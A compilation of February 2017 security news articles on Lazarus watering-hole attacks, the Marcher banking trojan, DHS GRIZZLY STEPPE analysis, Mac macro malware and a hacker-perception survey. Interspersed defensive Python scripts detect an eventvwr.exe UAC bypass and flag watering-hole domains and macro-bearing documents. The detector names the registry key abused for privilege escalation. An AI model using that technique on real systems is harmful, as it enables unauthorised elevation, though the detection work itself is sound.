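From the defender's side, the sequence both this article and the securityaffairs write-up above describe (a registry key written to point at the dropped file, then eventvwr.exe launched) leaves a distinctive trail in endpoint telemetry. The Python script below is an added example, not Palo Alto Networks' code: it correlates constructed Sysmon-style events (registry value set, process create) and raises an alert when the per-user mscfile handler is written, when eventvwr.exe starts shortly after such a write on the same host, and when eventvwr.exe spawns anything other than mmc.exe, its normal child. The article only says "a specific registry key"; the key tested here, HKCU\Software\Classes\mscfile\shell\open\command, is the one from the August 2016 writeup the article refers to. Hosts, users, paths and timestamps in the sample events are assumptions.

```python
"""Correlate Sysmon-style events for the eventvwr.exe UAC bypass the loader uses.

Added example; not Palo Alto Networks' code. SAMPLE_EVENTS are CONSTRUCTED
in the shape of Sysmon Event ID 13 (registry value set) and Event ID 1
(process create); hosts, users, paths and times are assumptions. The key
tested is the per-user mscfile handler from the August 2016 writeup the
article refers to; the article itself only says "a specific registry key".
"""
from datetime import datetime, timedelta

MSCFILE_KEY = r"\software\classes\mscfile\shell\open\command"
WINDOW = timedelta(seconds=120)  # how long a handler write stays "hot"

SAMPLE_EVENTS = [
    {"ts": "2017-02-13T09:00:01", "id": 1, "host": "ws17", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"},
    {"ts": "2017-02-13T09:00:07", "id": 13, "host": "ws17", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\mscfile\shell\open\command\(Default)",
     "details": r"C:\Users\alice\AppData\Local\Temp\bill.exe"},
    {"ts": "2017-02-13T09:00:08", "id": 1, "host": "ws17", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\eventvwr.exe",
     "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"},
    {"ts": "2017-02-13T09:00:09", "id": 1, "host": "ws17", "user": "CORP\\alice",
     "image": r"C:\Users\alice\AppData\Local\Temp\bill.exe",
     "parent": r"C:\Windows\System32\eventvwr.exe"},
    # benign: an admin opens Event Viewer, which launches mmc.exe
    {"ts": "2017-02-13T10:15:00", "id": 1, "host": "ws03", "user": "CORP\\bob",
     "image": r"C:\Windows\System32\eventvwr.exe", "parent": r"C:\Windows\explorer.exe"},
    {"ts": "2017-02-13T10:15:01", "id": 1, "host": "ws03", "user": "CORP\\bob",
     "image": r"C:\Windows\System32\mmc.exe", "parent": r"C:\Windows\System32\eventvwr.exe"},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return one alert per suspicious event, in time order.

    Three rules, from weakest to strongest evidence:
      1. any write to the per-user mscfile handler (legitimate software does not do this);
      2. eventvwr.exe starting within WINDOW after such a write on the same host;
      3. eventvwr.exe spawning anything other than mmc.exe, its normal child.
    """
    alerts = []
    handler_writes = {}  # host -> [(timestamp, event), ...]
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, host = datetime.fromisoformat(ev["ts"]), ev["host"]
        if ev["id"] == 13 and MSCFILE_KEY in ev.get("target", "").lower():
            handler_writes.setdefault(host, []).append((ts, ev))
            alerts.append({"rule": "mscfile-handler-written", "host": host, "user": ev["user"],
                           "evidence": f"{_basename(ev['image'])} wrote {ev['details']}"})
        elif ev["id"] == 1:
            image, parent = _basename(ev["image"]), _basename(ev["parent"])
            if image == "eventvwr.exe":
                prior = [(w_ts, w) for w_ts, w in handler_writes.get(host, [])
                         if timedelta(0) <= ts - w_ts <= WINDOW]
                if prior:
                    delay = int((ts - prior[-1][0]).total_seconds())
                    alerts.append({"rule": "eventvwr-after-mscfile-write", "host": host, "user": ev["user"],
                                   "evidence": f"eventvwr.exe started {delay}s after handler write"})
            if parent == "eventvwr.exe" and image != "mmc.exe":
                alerts.append({"rule": "eventvwr-unexpected-child", "host": host, "user": ev["user"],
                               "evidence": f"eventvwr.exe spawned {ev['image']}"})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['host']} {alert['user']}: {alert['evidence']}")
```

Rule 1 fires on its own because nothing legitimate writes that per-user handler; rules 2 and 3 tie the write to the actual elevation. Capturing the write requires Sysmon (or equivalent) registry auditing on HKCU\Software\Classes, which default configurations often omit.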


Survey Examines Cybersecurity Perception in U.S.

13.2.2017 securityweek Cyber
Survey Highlights Widely Divergent Views on State of Cyber Security in America

A new survey of American adults' perceptions of cybersecurity and hackers shows both a generational and a gender divide in attitudes. Young adults often display a more pragmatic approach compared to a more hardline attitude from older Americans, while there is a frequent difference between the genders.

5000 American adults aged 16+ responded to an online survey conducted by Opinion Matters for HackerOne and Kaspersky Lab during December 2016. The purpose was to get insight into consumers' perception of the hacker mindset and motivation without specifically differentiating between blackhat hackers and whitehat researchers.

The generational divide is clearly shown in the respondents' attitude towards hacker motivation. Fifty-two percent of respondents aged 45-55+ believe that hacker motivation is to be malicious, and 59% believe the motivation is to create problems. Only 35% of those aged 16-24 think hackers hack with malicious intentions.

However, far fewer Americans believe in 'good intentions': 15% believe hackers hack to report vulnerabilities, and only 14% believe they are motivated by 'good feeling' in helping companies and government understand security weaknesses.

Knowledge of bug bounty and pentesting operations seems to make little difference to Americans' buying behavior. Only 22% say they are more likely to make a purchase from companies that use these to protect their services, while 54% say it will make no difference.

Of particular interest is the response to a question about current politics: "Do you think North America will be more vulnerable to cyber-espionage or nation-sponsored cyberattacks with Donald Trump as President of the United States?" Only 28% believed in December 2016 that Trump policies will definitely make the US more vulnerable. Sixteen percent thought it possible, but 56% didn't "think the risk will be any higher than before."

This seems to be in sharp contrast to current thinking from the government agencies tasked with protecting the US. The Observer yesterday published an article headlined "Intelligence Community pushes back against a White House it considers leaky, untruthful and penetrated by the Kremlin." Written by John Schindler, a former National Security Agency analyst and counterintelligence officer, it claims, "Our Intelligence Community is so worried by the unprecedented problems of the Trump administration... that it is beginning to withhold intelligence from a White House which our spies do not trust."

Of particular concern is a series of December telephone conversations between national security adviser Michael Flynn and the Russian embassy in Washington which would have been automatically monitored by US SIGINT (discussed in detail in The Washington Post on Thursday last week).

The implication is that the American people had greater trust in Trump's national security in December 2016 than the US intelligence community has in February 2017.

The survey (PDF) question also highlights both the generational and gender differences among American attitudes. Men are less concerned than women (60% vs 52%) about the state of cybersecurity under the new administration, while millennials (aged 16-24) "were the most likely to think that North America would be more vulnerable to cyber espionage or nation-sponsored cyberattacks with Donald Trump as president (56%)."

Particularly concerning, however, is that the majority of consumers do not trust their own employers. "Only 36% of U.S. adults," says the report, "said that they would choose to be a customer of their own employer knowing what they know about their company’s cybersecurity program and ability to protect customers from cyber criminals."

"This study," concludes Ryan Naraine, head of the U.S. Global Research and Analysis Team at Kaspersky Lab, "helps to highlight the ongoing confusion among Americans, both at home and while at work, regarding cybersecurity. Cybersecurity is everyone's responsibility, and it's imperative that the security community, businesses and governments routinely work together to educate Americans on cyber threats. We need to ensure that consumers and organizations are not only educated on the risks, but also know the best solutions for safeguarding sensitive data from cybercriminals."


Thousands of Android Devices Infected by Marcher Trojan

13.2.2017 securityweek Android
Researchers at Dutch security firm Securify have conducted a detailed analysis of the Android banking Trojan known as Marcher and discovered that a single botnet has managed to steal a significant number of payment cards.

Marcher has been around since late 2013, but it initially attempted to trick users into handing over their payment card details using Google Play phishing pages. In March 2014, the malware started targeting banks in Germany and, by the summer of 2016, there had already been more than 60 targeted organizations in the U.S., U.K., Australia, France, Poland, Turkey, Spain and other countries.

The malware has been disguised as various popular apps, including Netflix, WhatsApp and Super Mario Run.

Securify has identified nine Marcher botnets over the last 6 months, and each of them has been provided with new modules and targeted web injects by the Trojan’s creators.

One of these botnets, which mainly targets the customers of banks in Germany, Austria and France, has infected more than 11,000 devices, including 5,700 in Germany and 2,200 in France. The attackers’ C&C server stored 1,300 payment card numbers and other banking information.

Based on the analysis of the command and control (C&C) server used by the cybercriminals, researchers determined that a majority of the infected devices had been running Android 6.0.1, but the list of victims also included more than 100 Android 7.0 devices.

Marcher infections

Marcher monitors the applications launched by the victim, and when one of the targeted apps is detected, an overlay screen is displayed in an effort to trick the user into handing over sensitive information.

“Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground. This library is used because it uses the only (publicly known) way to retrieve this information on Android 6 (using the process OOM score read from the /proc directory),” Securify researchers explained.

In order to avoid being removed by security products, Marcher blocks popular mobile antivirus applications. Seven months ago, researchers said the Trojan had been blocking eight antiviruses, but Securify’s report shows that the malware currently targets nearly two dozen products.

“Based on the statistics we found on this one C2 panel we researched and the amount of different C2 panels out there, we believe that the potential financial losses due to Android banking Trojans are, or will soon be, bigger than the current losses from desktop malware like Gozi and Dridex, especially since hardly any of the banking apps seem to detect the attack,” experts said.


Microsoft Unveils New Security and Risk Capabilities in Office 365

13.2.2017 securityweek Security
Microsoft has unveiled several new capabilities in Office 365 to help customers better manage risks and protect against threats, including Office 365 Secure Score, Threat Intelligence Private Preview, and Advanced Data Governance Preview.

Office 365 Secure Score was designed as a security analytics tool that applies a score to the customers’ Office 365 security configuration. Secure Score, says Alym Rayani, director for Microsoft's Office Security and Compliance team, was created to provide customers with improved visibility into their Office 365 security configuration and into the security features available to them.

With the help of this new tool, customers will not only be able to understand their current Office 365 security configuration, but also to learn how implementing additional controls can improve their security and reduce risk, Rayani says.

Secure Score provides access to Score Analyzer via the Secure Score Summary. The Secure Score (or the numerator) is the sum of the points associated with the security configurations that a customer has adopted. The total score (or the denominator) is the sum of the points associated with all of the security controls available on the customer’s Office 365 plan.

The Score Analyzer allows customers to track and report their score over time. Customers are provided with access to a graph that shows their score on any date in the past, while also offering info on the specific actions they completed and which were available to them. The tool also offers support for exporting the score results to a CSV file for further use within an organization.

Secure Score also offers suggestions on possible actions that could improve one’s security position. These suggestions, Microsoft says, are prioritized depending on their effectiveness and impact to end users, meaning that those that are highly effective but have low impact on user experience are placed at the top.

The Office 365 Threat Intelligence service, now in private preview, leverages the Microsoft Intelligent Security Graph to deliver actionable insights into global attack trends. The cost of data breaches is increasing, but organizations that are properly prepared for a breach can reduce its long-term costs.

The new Office 365 feature, Microsoft says, was designed to analyze data from global datacenters, Office clients, email, user authentications and other incidents and to deliver information about malware families inside and outside organizations, including breach information. Furthermore, it integrates with other Office 365 security features, including Exchange Online Protection and Advanced Threat Protection.

“Office 365 Threat Intelligence provides this visibility, along with rich insights and recommendations on mitigating cyber-threats, ultimately supporting a proactive defense posture, leading to long-term reduced organizational costs,” Rayani notes.

With the help of Office 365 Advanced Data Governance, customers can find and retain important data while eliminating redundant, obsolete and trivial data. By leveraging machine learning, it can deliver proactive policy recommendations; can classify data by analyzing numerous factors, including data type, age, and user interaction; and can take action such as preservation or deletion.

According to Microsoft, this means that organizations have a better grasp of their data and no longer expose themselves to unnecessary risks because they retain data they no longer need, but which could be exposed in the event of a data breach.

While Office 365 Secure Score is now available to organizations with an Office 365 commercial subscription and which are in the multi-tenant and Office 365 U.S. Government Community clouds, Office 365 Threat Intelligence and Advanced Data Governance should become available by the end of March 2017 as part of the Office 365 Enterprise E5 plan and the Secure Productive Enterprise E5 offering.


DHS Uses Cyber Kill Chain to Analyze Russia-Linked Election Hacks

13.2.2017 securityweek Cyber
DHS Publishes Enhanced Analysis Report on GRIZZLY STEPPE Activity

The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) on Friday published a new report providing additional indicators of compromise (IOC) and analysis using the cyber kill chain to detect and mitigate threats from the Russia-linked "GRIZZLY STEPPE" hackers.

On Dec. 29, 2016, the DHS and FBI published an initial Joint Analysis Report (JAR) detailing the tools and infrastructure used by Russian hackers designated by DHS as “GRIZZLY STEPPE” in attacks against the United States election. The previous report, however, didn’t deliver on its promise, security experts argued.

While the original report included a series of IOCs, some said that they were of low quality, had limited utility to defenders, and were published as a political tool attempting to connect the attacks to Russia.

The new report is described by DHS as an Analytical Report (AR) providing a “thorough analysis of the methods threat actors use to infiltrate systems” in relation to the GRIZZLY STEPPE hackers. The report provides additional details on IOCs, along with analysis along phases of the cyber kill chain, and suggests specific mitigation techniques that could be used to counter GRIZZLY STEPPE attackers.

Utilizing the Cyber Kill Chain to Analyze GRIZZLY STEPPE

DHS analysts leveraged the Cyber Kill Chain framework created by Lockheed Martin that describes the phases of an attack. The report summarizes the activity of the campaign using each phase of the Cyber Kill Chain, which are Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, and Actions on the Objective.

Cyber Kill Chain Diagram: Russia Hacks

The report also provides detailed host and network signatures to help defenders detect and mitigate GRIZZLY STEPPE related activity, including additional YARA rules and IOCs associated with the attacks.

The DHS has previously said that two different actors participated in the political attacks, one in the summer of 2015, namely APT29, and the other in spring 2016, namely APT28. The former is also known as Cozy Bear, or CozyDuke, while the latter is referred to as Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team.

DHS recommends that security teams read multiple bodies of work from various sources concerning GRIZZLY STEPPE.

“While DHS does not endorse any particular company or their findings, we believe the breadth of literature created by multiple sources enhances the overall understanding of the threat. DHS encourages analysts to review these resources to determine the level of threat posed to their local network environments,” the agency said.


Watering hole attacks on Polish Banks Linked to Lazarus Group
13.2.2017 securityweek Crime

According to security experts from Symantec and BAE Systems, the recently discovered attacks aimed at Polish banks are linked to the Lazarus Group.
Last week, several Polish banks confirmed their systems had been infected with malware after their staff visited the website of the Polish Financial Supervision Authority.

The cyber attack was first reported last Friday by Zaufana Trzecia Strona, a Polish news site.

The interesting aspect of the attack is that the attackers used the website of the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.

A spokesman for the KNF confirmed that the regulator's internal systems had been compromised by hackers "from another country". The attackers placed the malicious files used in the attacks against the Polish banks on the regulator's servers.

To stop the malware from spreading and "in order to secure evidence", the authorities decided to shut down the entire KNF network.


The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.

At the time of writing there is no evidence that the attackers successfully stole money from Polish banks or their customers, but some of the targeted organizations confirmed they had noticed large outgoing data transfers.

Both BAE Systems and Symantec have started investigating the attacks. According to Symantec, the threat actor behind them is the same one that has targeted financial organizations in 31 countries since at least October 2016.

According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and the experts who investigated the group consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The experts at Symantec have spotted in the past at least three strains of malware used by the group, Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee, which have been used in targeted attacks against financial institutions.

The attackers exploited “watering holes” in order to infect the machines of a specific audience with previously unknown malware.

“Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks. Since October, 14 attacks against computers in Mexico were blocked, 11 against computers in Uruguay, and two against computers in Poland.” reads the analysis published by Symantec.

Malware researchers at Symantec have identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. The attackers focused their activities on the banks, but the list of victims also includes ISPs and telecom operators.

“The attackers appear to be using compromised websites to redirect visitors to a customized exploit kit, which is preconfigured to only infect visitors from approximately 150 different IP addresses. These IP addresses belong to 104 different organizations located in 31 different countries. The vast majority of these organizations are banks, with a small number of telecoms and internet firms also on the list.” continues Symantec.


Experts at Kaspersky have linked the group to the Dark Seoul and Operation Troy hacking operations. Kaspersky Lab, together with a number of security firms including Novetta, AlienVault, Invincea, ThreatConnect, Volexity, Symantec and PunchCyber, has published reports on the activities of the Lazarus Group.

The group of security firms formed an alliance called Operation Blockbuster that issued the detection signatures to neutralize the hacking tools used by the APT.

In June 2016, analysis of the SWIFT attacks revealed five additional pieces of malware containing portions of code shared with Lazarus Group tools.

According to the analysis published by BAE Systems, one of the domains used in the Poland attack was also involved in a watering hole attack targeting the National Banking and Stock Commission of Mexico (cnbv.gob.mx), the Mexican equivalent of Poland's KNF.

“The eye-watch[.]in domain appears to have been used in watering-hole attacks on other financial sector websites. On 2016-11-08 we observed connections to the site referred from:

hxxp://www.cnbv.gob[.]mx/Prensa/Paginas/Sanciones.aspx

This is the page for the Comisión Nacional Bancaria y de Valores (National Banking and Stock Commission of Mexico), specifically the portion of their site that details sanctions made by the Mexican National Banking Commission. This organisation is the Mexican banking supervisor and the equivalent of Poland’s KNF.” reads the analysis published by BAE Systems.

Below are the key findings of the analysis conducted by BAE Systems:

There has been a series of watering hole attacks on bank supervisor websites in Poland & Mexico, and a state owned bank in Uruguay in recent months. These leverage Silverlight and Flash exploits to deliver malware.

Investigators in Poland have identified known Lazarus group implants on bank networks and associated this with the recent compromise of the Polish Financial Supervision Authority’s website.

The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear. However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.
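The watering-hole chain described above, a regulator page referring the visitor's browser to the attacker's domain, leaves a distinctive trace in web proxy logs: a request to the attacker host whose Referer is the regulator site. The following Python script is an added example written for this page, not code from the page, Symantec or BAE Systems. It scans a constructed proxy log (the five-field line format, the sample lines and the client addresses are all assumptions) for the domain and the referring sites quoted from the BAE Systems write-up, and grades each hit by whether the full referral chain is present.

```python
from urllib.parse import urlsplit

# Indicators quoted on this page from the BAE Systems write-up: the domain used
# in the Polish and Mexican watering-hole attacks (written eye-watch[.]in in the
# report) and the regulator sites whose pages referred visitors to it.
WATERING_HOLE_DOMAINS = {"eye-watch.in"}
REFERRING_SITES = {"www.knf.gov.pl", "www.cnbv.gob.mx"}

# Constructed sample proxy log in an assumed "timestamp client method url referer"
# format; "-" means no Referer header. Adapt parse_line() to your proxy's format.
SAMPLE_LOG = """\
2016-11-08T10:15:01Z 10.1.2.3 GET http://www.cnbv.gob.mx/Prensa/Paginas/Sanciones.aspx -
2016-11-08T10:15:02Z 10.1.2.3 GET https://eye-watch.in/script.js http://www.cnbv.gob.mx/Prensa/Paginas/Sanciones.aspx
2016-11-08T10:16:10Z 10.1.2.9 GET http://example.com/index.html -
2016-11-08T10:17:30Z 10.1.2.4 GET http://cdn.eye-watch.in/lib.js -
2016-11-08T10:18:00Z 10.1.2.5 GET http://example.net/news.html http://www.knf.gov.pl/
"""


def parse_line(line):
    """Split one log line into its fields; return None for lines that do not fit."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, method, url, referer = parts
    return {"ts": ts, "client": client, "method": method, "url": url,
            "referer": None if referer == "-" else referer}


def host_of(url):
    """Lower-cased hostname of a URL, or "" if there is no URL or no host."""
    if not url:
        return ""
    return (urlsplit(url).hostname or "").lower()


def in_domains(host, domains):
    """True if host equals, or is a subdomain of, any entry in domains."""
    return any(host == d or host.endswith("." + d) for d in domains)


def scan(log_text):
    """Return (ts, client, dst_host, referer_host, severity) for each hit.

    "high":   request to a watering-hole domain referred from a known regulator
              page, i.e. the exact chain BAE Systems observed.
    "medium": any request to a watering-hole domain or one of its subdomains.
    Requests to other hosts referred from the regulator are not flagged; the
    regulator site itself is not the malicious host.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        dst = host_of(rec["url"])
        ref = host_of(rec["referer"])
        if in_domains(dst, WATERING_HOLE_DOMAINS):
            severity = "high" if in_domains(ref, REFERRING_SITES) else "medium"
            findings.append((rec["ts"], rec["client"], dst, ref, severity))
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Run it against exported proxy logs after adjusting parse_line() to the real format. The "medium" hit on a subdomain shows why matching has to cover subdomains rather than exact hostnames, and the "high" hit gives the client address to pull for host forensics first.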

Take a look at both reports: they are full of information and also include IoCs.


Survey Examines Cybersecurity Perception in U.S.

13.2.2017 securityaffairs Cyber

Survey Highlights Widely Divergent Views on State of Cyber Security in America

A new survey of American adults' perceptions of cybersecurity and hackers shows both a generational and a gender divide in attitudes. Young adults often display a more pragmatic approach compared to a more hardline attitude from older Americans, while there is a frequent difference between the genders.

5000 American adults aged 16+ responded to an online survey conducted by Opinion Matters for HackerOne and Kaspersky Lab during December 2016. The purpose was to get insight into consumers' perception of the hacker mindset and motivation without specifically differentiating between blackhat hackers and whitehat researchers.

The generational divide is clearly shown in the respondents' attitude towards hacker motivation. Fifty-two percent of respondents aged 45-55+ believe that hacker motivation is to be malicious, and 59% believe the motivation is to create problems. Only 35% of those aged 16-24 think hackers hack with malicious intentions.

However, far fewer Americans believe in 'good intentions': 15% believe hackers hack to report vulnerabilities, and only 14% believe they are motivated by 'good feeling' in helping companies and government understand security weaknesses.

Knowledge of bug bounty and pentesting operations seems to make little difference to Americans' buying behavior. Only 22% say they are more likely to make a purchase from companies that use these to protect their services, while 54% say it will make no difference.

Of particular interest is the response to a question about current politics: "Do you think North America will be more vulnerable to cyber-espionage or nation-sponsored cyberattacks with Donald Trump as President of the United States?" Only 28% believed in December 2016 that Trump policies will definitely make the US more vulnerable. Sixteen percent thought it possible, but 56% didn't "think the risk will be any higher than before."

This seems to be in sharp contrast to current thinking from the government agencies tasked with protecting the US. The Observer yesterday published an article headlined "Intelligence Community pushes back against a White House it considers leaky, untruthful and penetrated by the Kremlin." Written by John Schindler, a former National Security Agency analyst and counterintelligence officer, it claims, "Our Intelligence Community is so worried by the unprecedented problems of the Trump administration... that it is beginning to withhold intelligence from a White House which our spies do not trust."

Of particular concern is a series of December telephone conversations between national security adviser Michael Flynn and the Russian embassy in Washington which would have been automatically monitored by US SIGINT (discussed in detail in The Washington Post on Thursday last week).

The implication is that the American people had greater trust in Trump's national security in December 2016 than the US intelligence community has in February 2017.

The survey (PDF) question also highlights both the generational and gender differences among American attitudes. Men are less concerned than women (60% vs 52%) about the state of cybersecurity under the new administration, while millennials (aged 16-24) "were the most likely to think that North America would be more vulnerable to cyber espionage or nation-sponsored cyberattacks with Donald Trump as president (56%)."

Particularly concerning, however, is that the majority of consumers do not trust their own employers. "Only 36% of U.S. adults," says the report, "said that they would choose to be a customer of their own employer knowing what they know about their company’s cybersecurity program and ability to protect customers from cyber criminals."

"This study," concludes Ryan Naraine, head of the U.S. Global Research and Analysis Team at Kaspersky Lab, "helps to highlight the ongoing confusion among Americans, both at home and while at work, regarding cybersecurity. Cybersecurity is everyone's responsibility, and it's imperative that the security community, businesses and governments routinely work together to educate Americans on cyber threats. We need to ensure that consumers and organizations are not only educated on the risks, but also know the best solutions for safeguarding sensitive data from cybercriminals."


Malware Attacks on Polish Banks Linked to Lazarus Group

13.2.2017 securityweek Virus
Poland Bank Attacks Part of Bigger Campaign Targeting Over 100 Organizations

The recently discovered attacks aimed at banks in Poland appear to be part of a bigger campaign targeting financial organizations around the world, and researchers have found some links to the threat actor known as Lazarus.

BadCyber reported earlier this month that the systems of several Polish banks had been infected with a new piece of malware. The attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) and abused it to deliver malware to its visitors.

While there is no evidence that money has been stolen from banks or their customers, some of the organizations whose systems have been infected have noticed large outgoing data transfers.

Researchers at Symantec and BAE Systems have also analyzed the attack and determined that the custom exploit kit used by the attackers was configured to infect only visitors with certain IP addresses.

Symantec has identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. Most of the targeted organizations are banks, but the list of targets also includes telecoms and Internet companies. The IP addresses have been linked to banks in Poland, the U.S., Mexico, Brazil, Chile, Denmark, Venezuela, Colombia, the U.K., Peru and India.

The custom exploit kit was used to target Symantec customers in Poland, Mexico and Uruguay in attacks first spotted in October 2016.

The Polish website used as a watering hole delivered a piece of malware known to be part of the toolkit of the Lazarus Group. This threat actor, analyzed last year by several security firms, has been active since at least 2009 – possibly as early as 2007 – and it has conducted not only cyber espionage operations, but also attacks whose goal was to destroy data and disrupt systems.

Several high profile attacks have been attributed to the Lazarus Group, including the 2014 attack on Sony, and the Dark Seoul and Operation Troy campaigns. The actor has targeted government, military, media, aerospace, financial and manufacturing organizations primarily in South Korea and the United States.

Researchers also discovered links between Lazarus and an attack on a bank in the Philippines believed to have been carried out by the same cybercriminals that stole $81 million from Bangladesh’s Central Bank.

BAE Systems discovered that one of the domains used in the recent Poland watering hole attack was also involved in a similar attack targeting the National Banking and Stock Commission of Mexico (cnbv.gob.mx), which is the Mexican equivalent of Poland’s KNF. The firm has also found evidence suggesting that the website of a state-owned bank in Uruguay had been targeted in a similar attack.

“The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear,” BAE Systems researchers said in a blog post. “However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.”


Word documents laced with malicious macros used to hack Apple Mac systems
13.2.2017 securityaffairs Apple
Crooks are exploiting Word documents laced with malicious macros to compromise Apple Mac systems in exactly the same way they do with Windows machines.
It is amazing how many Apple Mac users tell me their systems are immune from malware. This false sense of security is dangerous, and I believe it is important to explain how Mac systems, too, can be compromised by malicious code.

A recent event offers a good opportunity to explore the topic: crooks exploiting Word documents laced with malicious macros to compromise Apple Mac systems in exactly the same way they do with Windows machines.

Last week, security experts observed a spike in the distribution of spam messages carrying attachments that embed malicious macros. One of the baits was titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm”; when Mac recipients open the document, they are prompted to enable macros.


If the user enables macros, the document runs a Python function that downloads a malicious payload and executes it, infecting the machine. The Python code is publicly available: it is part of the open-source EmPyre project, and, as researcher Patrick Wardle highlighted, this new attack leverages old tricks.

“Today, Monday the 6th, was a busy day for macOS malware! First, Nex (@botherder) posted a great writeup, iKittens: Iranian actor resurfaces with malware for mac (macdownloader)“, which detailed some new macOS malware. Shortly thereafter, my friend Scott (@0xdabbad00) brought to my attention the following tweet:

Snorre Fagerland (@fstenv), 6 Feb 2017: #OSX #Macro #EmPyre "U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace" https://www.virustotal.com/en/file/07adb8253ccc6fee20940de04c1bf4a54a4455525b2ac33f9c95713a8a102f3d/analysis/
A malicious Word document targeting Mac users? I was intrigued :). I grabbed the sample (“U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm”), noting that only 4 AV engines currently flagged it as malicious”

The analysis of the attack revealed that the IP address used by the crooks to spread the malware is located in Russia and was already known to researchers monitoring phishing campaigns.

Patrick Wardle explained that this Apple Mac malware is not sophisticated; the attack requires user interaction to compromise the machine.

Because the attack relies on macros rather than a software vulnerability, it cannot be blocked by patching alone.

“Overall this malware sample isn’t particularly advanced. It relies on user interaction (to open a malicious document in Microsoft Word, (not Apple’s Pages)), as well as needs macros to be enabled. Most users know never to allow macros – right!?! Moreover using an open-source implant likely ensures that detection software should detect it – right!?” concluded Wardle.

“However let’s be nice and give the attackers some credit. By using a macro in a Word document they are exploiting the weakest link; humans! And moreover since macros are ‘legitimate’ functionality (vs. say a memory corruption vulnerability) the malware’s infection vector doesn’t have to worry about crashing the system nor being ‘patched’ out.”
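A .docm file is an OOXML zip package, so the cheapest triage check for an attachment like the one above is structural, and it works the same whether the recipient runs Word on a Mac or on Windows: look for the VBA project part and the macro-enabled content type before the document ever reaches Word. The following Python is an added example written for this page, not code from the page or from Patrick Wardle's analysis. The in-memory document it builds is a constructed stand-in with a placeholder blob in place of real VBA, not the actual sample, and the filenames are assumptions.

```python
import io
import zipfile

# OOXML markers: a macro-enabled Word document declares this main-part content
# type in [Content_Types].xml and carries its VBA project in word/vbaProject.bin.
MACRO_MAIN_PART = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_PART = ("application/vnd.openxmlformats-officedocument."
                   "wordprocessingml.document.main+xml")
VBA_PART = "word/vbaProject.bin"


def build_sample_doc(with_macros):
    """Constructed minimal Word package built in memory (not a real document).

    Only the parts the triage check inspects are present; the VBA part is a
    placeholder blob starting with the OLE magic, not real VBA.
    """
    main_ct = MACRO_MAIN_PART if with_macros else PLAIN_MAIN_PART
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
    )
    if with_macros:
        content_types += ('<Override PartName="/word/vbaProject.bin" '
                          'ContentType="application/vnd.ms-office.vbaProject"/>')
    content_types += "</Types>"

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            z.writestr(VBA_PART, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1 placeholder")
    return buf.getvalue()


def triage(data, filename):
    """Report whether an OOXML Word file carries macros and whether its name hides that."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = set(z.namelist())
            content_types = z.read("[Content_Types].xml").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError):
        return {"verdict": "not an OOXML package"}

    has_vba = VBA_PART in names
    macro_ct = MACRO_MAIN_PART in content_types
    carries_macros = has_vba or macro_ct
    ext = filename.lower().rsplit(".", 1)[-1]
    return {
        "has_vba_project": has_vba,
        "macro_enabled_content_type": macro_ct,
        # A .docx name on a macro-bearing package is a mismatch worth flagging on its own.
        "extension_mismatch": carries_macros and ext == "docx",
        "verdict": "macro-bearing" if carries_macros else "no macros",
    }


if __name__ == "__main__":
    # Assumed filename modelled on the lure described above.
    print(triage(build_sample_doc(True), "Digest Trump's Victory.docm"))
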